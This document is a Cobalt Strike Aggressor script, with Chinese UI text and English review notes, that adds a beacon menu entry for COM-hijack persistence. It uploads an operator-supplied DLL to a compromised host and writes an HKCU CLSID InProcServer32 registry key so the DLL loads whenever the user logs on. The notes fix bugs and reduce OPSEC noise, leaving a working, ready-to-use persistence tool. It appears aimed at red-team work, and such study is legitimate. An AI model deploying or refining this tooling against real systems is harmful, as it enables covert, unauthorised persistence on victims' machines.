COM劫持利用脚本编写

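# Aggressor (Sleep) script: per-user COM hijack persistence via an HKCU InProcServer32 key.
#
# Beacon task order inside the dialog callback:
#   1. bupload    - pushes the operator's local DLL into the beacon's working directory
#   2. bmv        - moves it to the requested on-target path
#   3. bpowerpick - (re)creates HKCU:\Software\Classes\CLSID\<clsid>\InProcServer32,
#                   points its default value at the DLL and sets ThreadingModel=Both
#
# Review notes on the original one-liner:
#   - Two ';' and one '.' concatenation operator were missing and stray U+200B
#     zero-width spaces were embedded in the code; all fixed here.
#   - $bid was assigned without local() (a Sleep global) and the dialog callback
#     read that global. Opening the dialog for several selected beacons at once
#     would therefore task only the beacon processed last. $bid is now bound into
#     the closure with lambda(..., $bid => $bid).
#   - The registry value was DLL_PATH . DLL_NAME while the bmv destination was
#     DLL_PATH alone, so the two disagreed whenever DLL_PATH already contained the
#     file name (as the field label suggests). One resolved path is used for both.
#   - The operator-supplied path was spliced into a double-quoted PowerShell
#     string. It is now single-quoted with embedded quotes doubled, so spaces,
#     '$', '"' or backslashes in the path cannot break or alter the command.
#   - NOTE(review): the key is written under HKCU, so the hijack applies to the
#     beacon's current user only; the dialog text's "任意用户" (any user) wording
#     is broader than what the code does.
#   - OPSEC: each bpowerpick call spawns a sacrificial process, so the registry
#     work is issued as a single script instead of three separate calls. A
#     reg.exe via brun variant (commented out in the original) is the alternative.

sub Show_COM_GUI {
    local('$bid $clsid $key $server $dialog');
    $bid = $1;

    # One definition of the hijacked CLSID and the keys derived from it, so the
    # remove / create / set steps cannot drift apart.
    $clsid  = "{0358B920-0AC7-461F-98F4-58E32CD89148}";
    $key    = "HKCU:\\Software\\Classes\\CLSID\\" . $clsid;
    $server = $key . "\\InProcServer32";

    $dialog = dialog("COM劫持用户登陆", %(), lambda({
        # $3 is the map of dialog field values: file, DLL_NAME, DLL_PATH.
        local('$local $name $dest $full $ps');
        $local = $3['file'];
        $name  = $3['DLL_NAME'];
        $dest  = $3['DLL_PATH'];

        # Refuse to task the beacon with an empty upload or destination.
        if (strlen($local) == 0 || strlen($dest) == 0) {
            show_error("本地DLL路径和上传路径不能为空");
            return;
        }

        # bupload stores the file under its local base name in the beacon's cwd;
        # that base name is the bmv source. DLL_NAME (the on-target name) falls
        # back to it when left blank.
        if (strlen($name) == 0) {
            $name = getFileName($local);
        }

        # Resolve ONE on-target path used for both the move and the registry
        # value. DLL_PATH may already end with the file name, or be a directory
        # with or without a trailing backslash.
        if (strlen($dest) >= strlen($name) && lc(right($dest, strlen($name))) eq lc($name)) {
            $full = $dest;
        }
        else if (right($dest, 1) eq "\\") {
            $full = $dest . $name;
        }
        else {
            $full = $dest . "\\" . $name;
        }

        bupload($bid, $local);
        bmv($bid, getFileName($local), $full);

        # Single PowerShell invocation for all registry work. -LiteralPath keeps
        # the braces in the CLSID out of wildcard expansion; the DLL path is
        # single-quoted with embedded quotes doubled so PowerShell takes it
        # literally; -ErrorAction SilentlyContinue makes the pre-clean of a
        # not-yet-existing key a no-op instead of an error.
        $ps = "Remove-Item -LiteralPath '" . $key . "' -Recurse -Force -ErrorAction SilentlyContinue; ";
        $ps = $ps . "New-Item -Path '" . $key . "' -Force | Out-Null; ";
        $ps = $ps . "New-Item -Path '" . $server . "' -Force | Out-Null; ";
        $ps = $ps . "Set-ItemProperty -LiteralPath '" . $server . "' -Name '(Default)' -Value '" . strrep($full, "'", "''") . "'; ";
        $ps = $ps . "Set-ItemProperty -LiteralPath '" . $server . "' -Name 'ThreadingModel' -Value 'Both'";
        bpowerpick($bid, $ps);

        # Record what was planted so cleanup (and IR hand-off) can find it later.
        blog($bid, "COM hijack staged: " . $server . " -> " . $full);
    }, $bid => $bid, $key => $key, $server => $server));

    dialog_description($dialog, "劫持任意用户登陆,任意用户登陆时将触发DLL. x64位用x64 dll,x86位用x86 dll。清除劫持:Remove-Item \"HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\\" -Recurse");
    drow_file($dialog, "file", "本地DLL路径: ");
    drow_text($dialog, "DLL_NAME", "DLL文件名:  ");
    drow_text($dialog, "DLL_PATH", "上传路径+DLL文件名:  ");
    dbutton_action($dialog, "Go");
    dialog_show($dialog);
}

# Beacon context-menu entry; opens one dialog per selected beacon.
popup beacon_bottom {
    item "&COM持久化" {
        local('$bid');
        foreach $bid ($1) {
            Show_COM_GUI($bid);
        }
    }
}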

